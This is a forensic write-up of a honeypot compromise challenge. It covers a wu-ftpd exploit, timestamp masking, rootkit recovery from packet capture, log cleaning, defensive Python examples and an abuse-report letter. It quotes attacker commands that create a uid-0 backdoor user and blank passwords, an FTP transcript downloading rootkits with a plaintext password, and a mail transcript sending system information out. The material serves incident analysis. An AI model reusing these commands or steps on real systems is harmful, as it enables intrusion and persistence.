The Challenge:
On September 16th a Redhat Linux 6.2 honeypot was compromised. This is the 3rd time this system was compromised by the same intruder. The honeynet is VMware based and uses a modified bash to log to syslog. Syslog is remotely logging to 0.0.0.0 (remote syslog server IP has been replaced). The compromised system has an IP of 192.168.1.102. After successfully breaking into the box, the attacker ended up using 3 modes of connecting and running commands (some of which is encrypted). The attacker also tried to hide some of his edits from the MAC times.
Downloads:
scan19.tar.gz, MD5 = 11e0be295d138df14111796a7733a5d2
scan19.zip, MD5 = c065797b3c2ddfad3396e3d4542ed8a7
1. Which vulnerability did the intruder exploit?
2. What ways, and in what order, did the intruder use to connect and run commands on the system?
3. How did the intruder try to hide his edits from the MAC times?
4. The intruder downloaded rootkits, what were they called? Are they new/custom rootkits?
5. Recover (tell how you did it too) the rootkits from the snort binary capture
6. What does the rootkit do to hide the presence of the attacker on the system?
7. What did you learn from this exercise?
8. How long did this challenge take you?
Bonus Questions:
Based on this challenge, write an example letter of notification to the source owner that attacked the system. Include any evidence or logs that you feel important.
The analysis:
$ wget http://project.honeynet.org/scans/scan19/scan19.tar.gz
$ md5sum scan19.tar.gz
11e0be295d138df14111796a7733a5d2  scan19.tar.gz
$ mkdir scan19; cd scan19; tar xzf ../scan19.tar.gz
1. Which vulnerability did the intruder exploit?
Following this is the exploit for the STAT service, which is obviously the "standard" buffer overflow and which apparently was unsuccessful.
After that there is no significant traffic towards the server until Sep. 17 at around 1am, which consisted of a telnet session coming from 217.156.93.166 with login attempts under the nobody and uucp accounts, both of which failed. This was followed by a few attempts to connect to ports 24 and 6666 (ports likely used by known Trojans).
Eventually, at 1:55am, the attacker connected from 207.35.251.172 to the ftp service (declared to be a wu-ftp 2.6.0) and logged in as the user ftp (anonymous). He then used the wu-ftp EXEC buffer overflow to force the ftp service to break down and eventually grant shell access (over the ftp control connection).
2. What ways, and in what order, did the intruder use to connect and run commands on the system?
First he used the ftp control connection he had buffer overflowed. Then he used telnet to log in and install the rootkits. And finally, ssh for the last and final session.
The intruder then used his "shell over ftp" to run commands on the system. After verifying his identity ("id" answered with uid=0, gid=0 etc...) and the users on the system ("w", which showed no users...), the attacker spent a few minutes browsing the filesystem, after which he started making his return easier by deleting the nobody user's password (passwd nobody -d).
3. How did the intruder try to hide his edits from the MAC times?
After which, he decided to try and masquerade the changes made to /etc/passwd and the /etc directory by using "touch" to copy the timestamps and modification time of the above to temporary files (at /etc/X11/applnk/Internet/.etcpasswd and /etc/X11/applnk/Internet/.etc). The only problem is that he performed the timestamp copying AFTER he had already altered the files once, so this action is futile.
He creates a new user called "dns" with shell access and a home directory at /bin and has a userid and groupid of root:
/usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash
passwd dns -d
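The "touch" trick above only copies atime and mtime; the inode change time (ctime) is always set by the kernel and cannot be copied back, which is how an analyst spots it. The following is an added example, not part of the original write-up: it replays the sequence in a temporary directory with constructed files (the names passwd, .etcpasswd and shadow are stand-ins for the real /etc files and the attacker's saved-timestamp file), emulates touch -r with os.utime(), and then flags files whose ctime is far later than their mtime.

```python
import os
import tempfile
import time

DAY = 86400

def copy_timestamps(reference, target):
    """Emulate `touch -r reference target`: copy atime and mtime from the
    reference file.  ctime cannot be set this way; the kernel stamps it with
    the current time, which is exactly what gives the trick away."""
    st = os.stat(reference)
    os.utime(target, ns=(st.st_atime_ns, st.st_mtime_ns))

def suspicious_timestamps(paths, slack=60):
    """Return the paths whose ctime is later than their mtime by more than
    `slack` seconds.  A normal content change sets mtime and ctime together;
    a later utime()/touch -r pushes ctime forward and leaves mtime behind."""
    flagged = []
    for p in paths:
        st = os.stat(p)
        if st.st_ctime - st.st_mtime > slack:
            flagged.append(p)
    return flagged

def demo():
    """Replay the sequence from the write-up with constructed files in a
    temp directory: passwd stands in for /etc/passwd, .etcpasswd for the
    attacker's saved-timestamp file, shadow for an untouched file."""
    d = tempfile.mkdtemp()
    passwd = os.path.join(d, "passwd")
    saved = os.path.join(d, ".etcpasswd")
    clean = os.path.join(d, "shadow")
    for p in (passwd, saved, clean):
        with open(p, "w") as f:
            f.write("root:x:0:0:root:/root:/bin/bash\n")
    # The saved-timestamp file carries the month-old times that the real
    # passwd file had before the intrusion (set with utime for the demo).
    old = time.time() - 30 * DAY
    os.utime(saved, (old, old))
    # Attacker edits passwd: mtime and ctime both move to "now".
    with open(passwd, "a") as f:
        f.write("dns:x:0:0::/bin:/bin/bash\n")
    # Attacker runs touch -r .etcpasswd passwd: mtime goes back, ctime does not.
    copy_timestamps(saved, passwd)
    return {
        "mtime_matches_reference": os.stat(passwd).st_mtime_ns == os.stat(saved).st_mtime_ns,
        "flagged": [os.path.basename(p) for p in suspicious_timestamps([passwd, clean])],
    }

if __name__ == "__main__":
    print(demo())
```

On Linux and other Unix systems st_ctime is the inode change time, so the check holds there (on Windows it is the creation time and the comparison is meaningless). In the case on the page the attacker also saved the timestamps after his first edit, so even the mtime he restored would have been the post-edit one.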
4. The intruder downloaded rootkits, what were they called? Are they new/custom rootkits?
He downloaded a file (rootkit) Zer0.tar.gz from teleport.go.ro after authenticating as "teleport" with a password of "gunoierul". He then downloaded two more files: copy.tar.gz and ooty.tar.gz.
Then he extracted the Zer0.tar.gz file, cd'd into the Zer0 dir and executed the rootkit's install script "Go". The rootkits seem to be an old rootkit with modifications (the language is Romanian, with some words in German).
5. Recover (tell how you did it too) the rootkits from the snort binary capture
The files were extracted from the snort logs by selecting an ftp DATA connection corresponding to the appropriate file (it can be identified by the RETR ftp control command just before it), then selecting "Follow TCP stream" and saving the output to a file.
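"Follow TCP stream" is just sequence-number reassembly of one direction of a TCP conversation. As an added example (not part of the original write-up or the challenge's tools), the script below builds a small pcap in memory whose payload is a constructed 2 KB "file" sent out of order with a retransmitted segment, then reassembles the flow by sequence number, trims overlaps and drops duplicates, and reports the MD5 of the recovered bytes. The addresses are the honeypot and the FTP server from the page; the client port 1034 and the initial sequence number are assumptions.

```python
import hashlib
import struct
from collections import defaultdict

PCAP_MAGIC = 0xA1B2C3D4

# Constructed "file" carried by the fake FTP data connection (not one of the
# challenge's rootkit archives): 2048 bytes of predictable content.
SAMPLE_FILE = bytes(range(256)) * 8

def build_pcap(payload, src, dst, sport, dport, chunk=500):
    """Write an Ethernet/IPv4/TCP capture in memory.  Segments are emitted
    in reverse order and the first one is duplicated, so that a naive
    concatenation in capture order would corrupt the file."""
    segs = [(off, payload[off:off + chunk]) for off in range(0, len(payload), chunk)]
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, 1)  # link type 1 = Ethernet
    isn = 1000  # constructed initial sequence number
    for off, data in segs[::-1] + segs[:1]:
        tcp = struct.pack("!HHIIBBHHH", sport, dport, isn + off, 0, 5 << 4, 0x18, 65535, 0, 0)
        ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(data),
                         0, 0, 64, 6, 0, bytes(src), bytes(dst))
        frame = b"\x00" * 12 + b"\x08\x00" + ip + tcp + data
        out += struct.pack("<IIII", 0, 0, len(frame), len(frame)) + frame
    return out

def reassemble_streams(pcap):
    """Glue each unidirectional TCP flow back together in sequence order,
    dropping retransmitted duplicates: what "Follow TCP Stream" does."""
    endian = "<" if struct.unpack("<I", pcap[:4])[0] == PCAP_MAGIC else ">"
    if struct.unpack(endian + "I", pcap[20:24])[0] != 1:
        raise ValueError("only Ethernet captures are handled here")
    segments = defaultdict(dict)  # flow -> {seq: payload}
    pos = 24
    while pos + 16 <= len(pcap):
        caplen = struct.unpack(endian + "IIII", pcap[pos:pos + 16])[2]
        frame = pcap[pos + 16:pos + 16 + caplen]
        pos += 16 + caplen
        if frame[12:14] != b"\x08\x00":
            continue  # not IPv4
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        if ip[9] != 6:
            continue  # not TCP
        total_len = struct.unpack("!H", ip[2:4])[0]
        tcp = ip[ihl:total_len]
        sport, dport, seq = struct.unpack("!HHI", tcp[:8])
        data = tcp[(tcp[12] >> 4) * 4:]
        if data:
            flow = (".".join(map(str, ip[12:16])), sport, ".".join(map(str, ip[16:20])), dport)
            segments[flow].setdefault(seq, data)  # first copy of a seq wins
    streams = {}
    for flow, segs in segments.items():
        buf, expected = bytearray(), None
        for seq in sorted(segs):
            data = segs[seq]
            if expected is not None and seq < expected:
                data = data[expected - seq:]  # trim overlap with data already kept
            buf += data
            end = seq + len(segs[seq])
            expected = end if expected is None else max(expected, end)
        streams[flow] = bytes(buf)
    return streams

def recover_file(pcap, flow):
    """Return the bytes of one flow plus their MD5, as you would record for a
    recovered rootkit archive."""
    data = reassemble_streams(pcap)[flow]
    return data, hashlib.md5(data).hexdigest()

if __name__ == "__main__":
    # Active-mode FTP: the server's port 20 pushes the file to the client's PORT.
    cap = build_pcap(SAMPLE_FILE, (193, 231, 236, 42), (192, 168, 1, 102), 20, 1034)
    data, digest = recover_file(cap, ("193.231.236.42", 20, "192.168.1.102", 1034))
    print(len(data), digest, data == SAMPLE_FILE)
```

On a real capture the flow to pick is the one whose three-way handshake immediately follows the RETR on the control connection; record the digest of the recovered archive before doing anything else with it.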
6. What does the rootkit do to hide the presence of the attacker on the system?
It deleted lines from the log files configured in syslog (and detected the remote logging... guess the look on the attacker's face when he saw this...). The log cleaning procedure was run three times (probably until no lines needed to be removed...).
The final access (as mentioned before) was done using ssh to connect to the server (after installing the backdoor in the ssh daemon, of course...), during which the attacker cleaned up some of the files he had downloaded.
7. What did you learn from this exercise?
Remote logging is too valuable to be neglected. The attacker must have spent some time looking at the message telling him he had better get access to the remote logging host too...
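The reason remote logging pays off is that the rootkit's log cleaner only reaches the local copy, so the lines it removed are exactly the difference between the two copies. This added example (not from the write-up, and the log lines are constructed to mimic the modified bash and syslog on the page, not taken from the real capture) compares a remote syslog copy with the local one, lists the lines deleted locally in their original order, checks that the local log is a pure subset (no reordering or injected lines), and tallies the deletions per program.

```python
from collections import Counter

# Constructed syslog excerpts (not the challenge's real logs).  The remote
# copy is what the syslog server received; the local copy is what is left on
# the compromised host after the rootkit's log cleaner ran.
REMOTE_LOG = """\
Sep 17 01:55:12 ns1 ftpd[1023]: FTP LOGIN FROM 207.35.251.172, anonymous
Sep 17 01:58:40 ns1 bash[1040]: HISTORY: UID=0 PID=1040 id
Sep 17 02:03:15 ns1 bash[1040]: HISTORY: UID=0 PID=1040 passwd nobody -d
Sep 17 02:05:02 ns1 bash[1040]: HISTORY: UID=0 PID=1040 /usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash
Sep 17 02:20:44 ns1 sshd[1101]: Accepted password for dns from 207.35.251.172
"""
LOCAL_LOG = """\
Sep 17 01:58:40 ns1 bash[1040]: HISTORY: UID=0 PID=1040 id
Sep 17 02:20:44 ns1 sshd[1101]: Accepted password for dns from 207.35.251.172
"""

def lines(text):
    return [l for l in text.splitlines() if l.strip()]

def deleted_lines(remote, local):
    """Lines present in the remote copy but absent locally, in remote order.
    Counts are compared as a multiset, so a repeated line removed once is
    still reported."""
    left = Counter(lines(local))
    missing = []
    for l in lines(remote):
        if left[l] > 0:
            left[l] -= 1
        else:
            missing.append(l)
    return missing

def is_subsequence(local, remote):
    """True if the local log is the remote log with lines removed only:
    no reordering and no lines the server never saw."""
    it = iter(lines(remote))
    return all(any(l == r for r in it) for l in lines(local))

def program_of(line):
    """Extract the syslog tag ('ftpd' from 'ftpd[1023]:')."""
    return line.split()[4].split("[")[0].rstrip(":")

def summarize(remote, local):
    missing = deleted_lines(remote, local)
    return {
        "deleted": missing,
        "pure_deletion": is_subsequence(local, remote),
        "by_program": dict(Counter(program_of(l) for l in missing)),
    }

if __name__ == "__main__":
    for line in summarize(REMOTE_LOG, LOCAL_LOG)["deleted"]:
        print("removed locally:", line)
```

A non-empty "deleted" list together with pure_deletion being true is the signature of a log cleaner; pure_deletion being false instead points at clock skew, lost UDP syslog datagrams, or lines written locally after the remote copy was taken, which are worth ruling out before blaming tampering.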
8. How long did this challenge take you?
Approximately 4-5 hours including the write-up.
Bonus Questions:
Based on this challenge, write an example letter of notification to the source owner that attacked the system. Include any evidence or logs that you feel important.
Dear ____
I would like to inform you that someone from your network has abused his right to an internet connection and has performed illegal actions against a server in our network.
He has installed Trojans and abused the system.
Much evidence has been gathered that supports this (as you can see below).
We urge you to promptly take care of the person(s) responsible for these actions.
Transcripts from the attacker session:
ftp teleport.go.ro
Connected to teleport.go.ro.
220-
220-
220- H O M E . R O
220-
220- This server is for HOME.RO members only.
220- Go to http://www.home.ro/ to register.
220-
220- No anonymous access allowed.
220-
220-
220 ProFTPD 1.2.2rc3 Server (HOME.RO Members FTP) [193.231.236.42]
Name (teleport.go.ro:nobody): teleport
331 Password required for teleport.
Password:gunoierul
230 User teleport logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd new
250 CWD command successful.
ftp> get Zer0.tar.gz
local: Zer0.tar.gz remote: Zer0.tar.gz
200 PORT command successful.
150 Opening BINARY mode data connection for Zer0.tar.gz (139711 bytes).
226 Transfer complete.
139711 bytes received in 7.76 secs (18 Kbytes/sec)
ftp> get copy.tar.gz
local: copy.tar.gz remote: copy.tar.gz
200 PORT command successful.
150 Opening BINARY mode data connection for copy.tar.gz (265189 bytes).
226 Transfer complete.
265189 bytes received in 14.6 secs (18 Kbytes/sec)
ftp> get ooty.tar.gz
local: ooty.tar.gz remote: ooty.tar.gz
200 PORT command successful.
150 Opening BINARY mode data connection for ooty.tar.gz (14847 bytes).
226 Transfer complete.
14847 bytes received in 0.856 secs (17 Kbytes/sec)
ftp> bye
221 Goodbye.
220-HotMail (NO UCE) ESMTP server ready at Sun, 16 Sep 2001 17:46:55 -0700
220 ESMTP spoken here
EHLO localhost.localdomain
250-hotmail.com Hello
250-8bitmime
250 SIZE 1572864
MAIL From:<root@localhost.localdomain> SIZE=2794
250 Requested mail action okay, completed
RCPT To:<hatcheryhatched@hotmail.com>
250 Requested mail action okay, completed
DATA
354 Start mail input; end with <CRLF>.<CRLF>
Received: (from root@localhost) by localhost.localdomain (8.9.3/8.9.3) id FAA08755; Sun, 16 Sep 2001 05:01:57 -0400
Date: Sun, 16 Sep 2001 05:01:57 -0400
From: root <root@localhost.localdomain>
MIME-Version: 1.0
To: hatcheryhatched@hotmail.com
Subject: ns1
Message-ID: <0_8752_1000630917_1@ns1>
Content-ID: <0_8752_1000630917_2@ns1>
Content-type: text/richtext
Content-Transfer-Encoding: quoted-printable
[system information here...]